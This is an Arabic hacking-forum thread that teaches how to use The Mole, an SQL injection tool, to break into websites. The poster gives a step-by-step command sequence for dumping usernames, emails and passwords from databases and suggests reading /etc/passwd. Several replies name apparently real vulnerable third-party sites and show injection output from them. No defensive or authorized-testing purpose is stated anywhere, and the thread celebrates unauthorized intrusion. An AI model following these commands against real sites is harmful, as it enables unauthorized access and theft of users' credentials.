:: vBspiders Professional Network :: - لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

- - لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :) (http://www.vbspiders.com/vb/t64306.html)

Q2-ksa

08-17-2012 02:23 AM

لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

1 مرفق

السلام عليكم ورحمة الله وبركاته..

اتمنى تكونون بخير ..ومبروك عليكم العيد جميعاً

هذا اليوم قمت بعمل شرح لاداة
mole

لأن الكثيرمنكم لا تعمل معه الاداة حسب شرح موقع الشركة لها ..
وهذا الشرح الفيديو العربي هو الأول مع التطبيق على موقع من بداية تحميل الاداة :14:
الى أن نقوم بالدخول على لوحة الادمن :clap:

http://im27.gulfup.com/2012-08-17/1345155677701.jpg

طبعاً الاداة خاصة بالحقن ..
واداة قوية صراحه .. ورهيبة ..

ان شاء الله الشرح واضح جداً ..
واي استفسار انا حاضر ..

((بالنسبة لـ الموقع عليكم بالعافية )) :msn-wink:

للتحميل :

mediafire.com/?m451sck8midyow9

انسخوه وضعوه بالمتصفحح ..
لاني ممنوع من وضع الروابط لان مشاركاتي لم تتعدى الـ 5..:no:

او حمّلوا المذكرة المرفقة بالموضوع .. وضعت داخلها الرابط تبع التحميل..

ملاحظة مهمة :
عند اعطاء امر

query
واختيار الاعمدة الخاصة بالبيانات المطلوبة
نفرض انه مثلاً اعطينا الامر بهالطريقة

query ogunch_dbsbs_members id,email,username,password
واعطينا انتر ..
وطلع لنا جدول فاضي !!
نقوم بتكرار الامر لكن باختيار عمود واحد مثلاً هكذا

query ogunch_dbsbs_members id
اخترنا فقط الـ id
سيظهر لنا ارقام الاي دي ..
لكن بعدها نقوم بنكرر الامر مع اختيار الاعمده كلها
الباسوورد والايميل واليوزر نيم والـ اي دي
لانه احياناً يحصل تعليق بسيط ..
وهالكلام قليل يحصل ..
بس حبيت انوّه ع هالشيء ع اساس اكون وضّحت لكم الموضوع بصورة جيده..

مع تحياتي
اخوكم
Q2 - ksa
:wink:

http://im13.gulfup.com/2012-07-22/1342930165151.png
Scanned By GHOST HACK

Q2-ksa

08-17-2012 02:35 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

مرحباً ..
عفواً نسيت احط لكم موقع لاخواننا المبتدئين .. لاظهار مسارات الدخول..
مع ان فيه عدة طرق لاستخراج المسارات ..

y-shahinzadeh.ir/af/index.php

انسخوه لـ المتصفح ..

aircrack -ng

08-17-2012 02:57 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

يعطيك العافيه

ولا واحد يحمل حتى يتم الفحص

!.!	08-17-2012 03:05 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

شكرا لك اخوي جاري التحميل والفحص ...ان شاء الله يكون سالم معافا ان شاء الله يارب..
جزاك الله خيرا عنا وعنك يا حبيبي

Q2-ksa

08-17-2012 03:05 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة aircrack -ng (المشاركة 445834)

يعطيك العافيه

ولا واحد يحمل حتى يتم الفحص

الله يعافيك اخوي ..

انا أضم صوتي لـ صوتك .. ( لا احد يحمل حتى يتم الفحص )..:14:
انا أعلم ان هذا القرار ليس إقلال من الثقة بي .. لكن هو من حق الجميع ..:smile:

محمد50

08-17-2012 03:16 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

حلو العملك وتقديم الموضوعك
لاكن افضل الاخترقات
الاخترق المستهدف عبر (((الوندوز او عبر الانضمه الاخر ))) الانضمه الاخر افضل من الوندوز
وشكنر على التقديم
باااااااااااااااااااااااااااااي
كان معك
محمد50

!.!	08-17-2012 03:17 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة Q2-ksa (المشاركة 445839)

+1000
الملف مفحوص ان شاء الله مافيه شئ حملو لا تخافو
:bleh:

محمد50

08-17-2012 03:17 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

+ لك تقيم على الموضوعك
باااااااااااااااااااااااااااااااي

محمد50

08-17-2012 03:19 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

التقيم
الموضوعك
((("جيد")))

Q2-ksa

08-17-2012 03:25 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة محمد50 (المشاركة 445840)

اهلاً يامحمد ..
الحلو وجودك ..
عندما تريد استهداف موقع .. سـ تلجأ لعدة طرق .. لكن الهدف واحد ..الهدف هو الاختراق ..
وثغرات الـ sql تجدي نفعاً مع الاستهداف ..
و الاختراق العشوائي ممتع لمن يريدون ممارسة الاختراق بشكل عام .. او عمل بعض الشروحات على الشل او على تخطيات الحماية او ع اي هدف قائم لاجل الاختراق ..

بالنسبة لكلامك (عن الانظمة الاخرى) ..
المسألة مسألة خبرة .. وممارسة..
نظام الويندوز في يد (المبرمج) افضل من اللينكس في يد (متوسط الخبرة)..
وعلى فكرة .. الاداة التي قمت بشرحها تعمل على (لينكس وماك وويندوز) ..
ولا يوجد في الانترنت شرح فيديو واضح مثل ماشرحت انا .. الا شرح واحد من الشركة المصنعه للاداة وشرح غير واضح..
فـ نظراً لكثرة طلبات شرح الاداة في عدة مواقع قمت بـ عمل هذا الشرح..
ولم انزل هذا الموضوع الا هنا وفي منتدى صديق لي ..

تمنياتي للجميع بالتوفيق ..
:)

!.!	08-17-2012 03:26 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

والله في حياتي ما شفت شئ فعال مثل هاذي الاداة
اخوي لو تكرم وتحط لنا الاوامر
لكي يكون موضوعك كامل ان شاء الله اليك احر التهاني اليك يا غالي

aircrack -ng

08-17-2012 03:43 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة محمد50 (المشاركة 445840)

انا اشرحلك
الوندوز او اللينكس كل الطرق تاذي الى روما
الوندوز فيه ادوات تشتغل بس على الوندوز ومش موجوده في اللينكس
واللينكس فيه ادوات مش موجوده في الوندوز وتشتغل ع اللينكس
وانا استعمل الوندوز ومركب الباك تراك على نظام وهمي ولما بدي اجرب لدي كلا النظامين

عذرا صاحب الموضوع خرجت عن سياق الموضوع

Q2-ksa

08-17-2012 03:52 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة !.! (المشاركة 445847)

تأمر امر ياغالي ..

الاوامر واضحه في الشرح الفيديو .. لكن يالله ماعليه لعيونكم اضع لكم الاوامر بشكل سريع ..
طبعاً المجلد تبع الاداه فيه ملف exe هذا الاصدار خاص بالويندوز ..وهو الي راح نشغله بامر الدوس ..

بعد نقل الاداة لـ السي نقوم بفتح الدوس والانتقال بالمحرر لـ مسار السي وننتقل ايضاً بالمحرر الى مجلد الاداة .. ونقوم باعطاء هذا الامر
mole.exe -u wwwxxxxxxx.com/index.phpphp?id=3 -n 'schemas'

تشتغل الاداه نعطي الامر
needle schemas

ثم
schemas

راح تطلع الداتا بيس..

tables
ثم مسافه ثم اسم الداتا وانتر .. تظهر الاعمده ..
و
columns
ثم مسافه ثم اسم الداتا بيس وثم مسافة ثم اسم الجدول المطلوب ..وانتر

ثم تظهر لنا الاعمده ..

query
هذا الامر الاخير .. نكتب بعده اسم الداتا بيس التي تم اختيارها مسبقاً ثم مسافة و اسم الجدول ومسافة واسم الاعمده المطلوبه بياناتها مثال
query ogunch_db sbs_members id,email,username,password

في المثال الاعلى :
ogunch_db هذا اسم الداتا تبع الموقع..
sbs_members اسم الجدول
وهذه اسماء الاعمده :
id,email,username,password
طبعاً لازم نضع فاصلة بين كل اسم عمود وعمود اخر ..

وهكذا .. الى نهاية الموضوع..

شرحها واضح جداً ولو بغيتوا ارفعها ع اليوتيوب ماعندي مشكلة ياقماعة..

!.!	08-17-2012 04:00 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

هه صحيت خويا ربي يجازيك ويرفع عنك ان شاء الله لكن انا عملت مثل ماعامل انت بالظبط وظهرت مشكلة وهي

اقتباس:

#> needle schemas
#> schemas
[-] Could not detect SQL Injection: Needle not found (Needle not in page)

لم يجد جداول دتا بيز وانا لسع في الطريقة الاولة وان شاء الله نكون ماازعجتك وانا اسف جدا على هذا الصراحت اعجبني الاداة والشرح ربي يعطيك ماتتمنا ان شاء الله
جربتو على ثلاث مواقع لذا شوف هاذو المواقع مصابين بثغرة sql لكن نفس المشكلة شوف
www.cam-ceeds.org/event.php?ID=30
http://valleyviewcasinocenter.com/event.php?id=202

Q2-ksa

08-17-2012 05:07 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

1 مرفق

اقتباس:

المشاركة الأصلية كتبت بواسطة !.! (المشاركة 445852)

هه صحيت خويا ربي يجازيك ويرفع عنك ان شاء الله لكن انا عملت مثل ماعامل انت بالظبط وظهرت مشكلة وهي

حمل المذكرة .. المرفقه في ردي هذا ..

PM2CL

08-17-2012 06:33 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

لدي موق أخترقته ب sql صابقا والثغرة شغالة
لاكن عندما أجرب الاداة لاتشتغل

C:\themole-0.2.6>mole.exe -u http://apos.co.in/bulletindisplay.php?bulletin=5 -n
'shcemas'
_____ _ ___ ___ _
|_ _| | | \/ | | |
| | | |__ ___ | . . | ___ | | ___
| | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
| | | | | | __/ | | | | (_) | | __/
\_/ |_| |_|\___| \_| |_/\___/|_|\___|

Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!

#> needle schemas
#> schemas
[-] Could not detect SQL Injection: Needle not found (Needle not in page)
#>

GHOST HACKERS

08-17-2012 06:49 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

موفق اخي ..............

Q2-ksa

08-17-2012 06:18 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة PM2CL (المشاركة 445894)

اهلاً ياصديقي .. :)
ليش انت زعلان :)

تفضل هذه صورة للحقن تبع موقعك ..

المره الاخرى عط الامر
needle user
schemas user

http://im20.gulfup.com/2012-08-17/134521491061.jpg

http://im27.gulfup.com/2012-08-17/1345215098941.jpg

Q2-ksa

08-17-2012 06:24 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

لا احد يجي يقول الأداه ما أشتغلت ..
عطوا الأوامر اللي انا عطيتها في الشرح مبدأياً ..
واذا واجهتوا مشكلة عطوا الاوامر اللي انا شرحتها للأعضاء اللي واجهوا مشكلة..

موفقين خير باذن الله ..

ViRuS Qalaa

08-17-2012 08:47 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

تسلم حبيبي ع الشرح الرائع
بارك الله فيك ..,

الشيطانو

08-19-2012 04:30 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

لم اسمع في حياتي بهده الاداة جاري التجربة
وبارك الله فيك

محمد50

08-19-2012 09:02 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

---------------------------------------------------------------------------------------------------------
نابئن ان انت لك خبره بي الانضمه
مثل الانضمه الينونكس ولينكس واتروان
ليش ما تبحث عن الانضمه الاخر
او هل تعرف الاشخاص الهكر والكراكرز ولتنكس و.......
كل هاذ الشغلالات لقد تم اعتزلي لان حدث لي مشكل في شبكه العنكبوت
وانا واعود بي كلمت انا ((انا كنت لو تعرفوا بي موقع اسمه )) ((( قرصنة العرب))) الرابط الموقع هاذ
(( http://www.xp10.com))
انا كنت القيدي لي حملات مثل المبليوست
او جهد العرب
او يا من ملحدين الاسلام
او
او ............
لكن خلي نحن بي
الوقعه
نحن اشخص سريون لي الغيه ونحن ما تنكلامي بي اشياء اكتشفها
لكن نحن نعطف على المحتجين لي العلم وعلى ما قال
العلم نور والجهل ضلام وانا عرف ان انت اكتشفت الادره وركبتهاء على النودوز ام من نحيه لي الينكس ممكن انت دمجت الاده معاء النضام الباك تراك
ام انت علمت اتصال بين النضم الاصلي والنضم الوهمي علمت اتثصال vip ممكن
وعلى العموم انا
ما قلت شي لكن انا حبيت ان اقوم بي اطرح رئي لي الموضوع ولي صحب الموضوع
ام اذ انا ازعجتك بي شي انا اسف لو انت تبغاء ان عدم المشركت جميع الموضيعك انا جهز لي ان ما اشارك بي جميع الموضيعك
اوكيه يا الاخ الكريم يا

اقتباس:

Q2-ksa

وعلى ما اضن ان انا كثرت بي الكلام حق انا
اسف اسف اسف
وعلى العموم
.................................................. .................................................. .........................................
.................................................ك ل عام وانتم بخير .................................................. ..................
............................................بااااا اااااااااااااااااااي .................................................. ..................
.................................................ت حاتي كان معكم .................................................. ...................
.................................................. ......محمد50 .................................................. ...................
............................................بااااا ااااااااااااااااااااااااااي .................................................. ......

Q2-ksa

08-20-2012 02:02 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اقتباس:

المشاركة الأصلية كتبت بواسطة الشيطانو (المشاركة 446076)

لم اسمع في حياتي بهده الاداة جاري التجربة
وبارك الله فيك

اهلاً اخوي شيطانو ..
كما هو المعروف ان ادوات البايثون قليل من يقومون بشرحها..
فلن تجد اي شخص غيري شرح هذه الأداة بهذه الطريقة مع التطبيق ومع ذكر ربط الأوامر مع بعض لإظهار نتيجة جيده..مع ان الشركة لم تذكر هذه الاوامر بهذه الطريقة وهذا الربط..ومافيه منتدى سواءً عربي او اجنبي قام بوضع هذه الأوامر ..:icon30:
لكن لعيونكم كل شي (يصير) :blush-anim-cl:

نسيت أن أضع لكم نقطة مهمّة في حال لم تخرجوا بنتيجة من الأوامر التي وضعتها لكم ..
عندما تحدد الـ needle سواءً بـ هذه الطريقة :
needle admin
needle user
needle schemas
needle schema
needle mysql
ولم تخرج بنتيجة .. قم نسخ الدومين الخاص بالموقع المصاب ..
نفرض مثلاً هذا هو الموقع
http://abc123.com
نقوم بكتابة
needle abc123
ونعطي بعدها امر الـ schemas

وان شاء الله تطلعون بنتيجة نفس ماطلع معي هنا:

اقتباس:

#> needle prestonathletics
#> schemas
[i] Trying injection using 0 parenthesis.
[+] Found separator: " "
[+] Found DBMS: Mysql
[+] Found comment delimiter: "#"
[+] Query columns count: 8
[+] Injectable fields found: [1, 3, 4, 5, 7]
[+] Found injectable field: 1
[+] Using string union technique.
[+] Rows: 2
+--------------------+
| Databases |
+--------------------+
| information_schema |
| prestona_oaidb |
+--------------------+

Q2-ksa

08-20-2012 02:21 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

تقدرون برضو تعطون هذا الأمر:
find_users_table mysql
للبحث عن جداول اليوزر تبع القاعدة..

على فكرة .. الاداة تطلّع databeas اللي ماتطلّعها اداة الهافيج..
يعني ( الاداة قوّية )..
ولو أعطينا الأمر هذا:
dbinfo
راح يبين لك معلومات.
لو مثلاً صارت معك بهذه الطريقة :
root@localhost

وقتها بأمكانكم تستخدمون أمر :
readfile /etc/passwd

:)

sni!ip3r

08-20-2012 01:11 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

شرح لايـ على عليه
ولااول مرهـ اشوفه

استحملنا شوي اخوي
Mole not ready: Attribute url and vulnerable param are required

مآافهمت وش مقصدهـ من هالعبآارهـ ؟

وهنآء مشكله ثانيه بـ موقع ثآاني

#> needle user
#> schemas user
[i] Trying injection using 0 parenthesis.
[i] Trying injection using 1 parenthesis.
[i] Trying separator: ( )

منتظرك ع احر من الجمر .. الاداه جبتها بوقتها الله يطيك العآافيه

دحمان39

08-27-2012 04:09 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

بارك الله فيك يابطل

المفترس

08-27-2012 06:57 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

ما اشتغلت معاي صارلي متل الاخ PM2CL
طبقت ما شرحته في الردود التي تليه ولكن ولا نتيجة

المهم انا من عشاق الحقن اليدوي
كنت حاب اخد فكرة عليها فقط

Dr..ViRuS

10-17-2012 02:17 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

يعطيك العافيه ياريت لو كنت شرحت شرح فيديو كان احسن

خالد سعودي

10-17-2012 03:12 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

اداء جميلة تفيد النظام التشغيل ويندوز كثير ولكن هل الاداء تخطى الفلتر
وشكرا على الشرح

moon2

11-10-2012 06:37 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

بارك الله فيك اخي العزيز

تحياتي

mjnnkm

11-15-2012 04:57 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

بارك الله فيك اخوي

مشكور ع الشششرح ,

تم التقيم

ودي

guba.1

11-22-2012 07:29 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

يعطيك العافيه اخوي

الله لا يحرمنى من جديدك ,

دام علاء العماد

11-22-2012 09:50 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

موضوع قوي و رائع يا أخي الكريم ، بارك الله فيك و جزاك الله عنا كل خير

Saif Al-Naar

11-22-2012 10:39 PM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

مشكور يا الغالي

hatemfek

12-03-2013 01:03 AM

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

thanks

الساعة الآن 11:19 AM

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0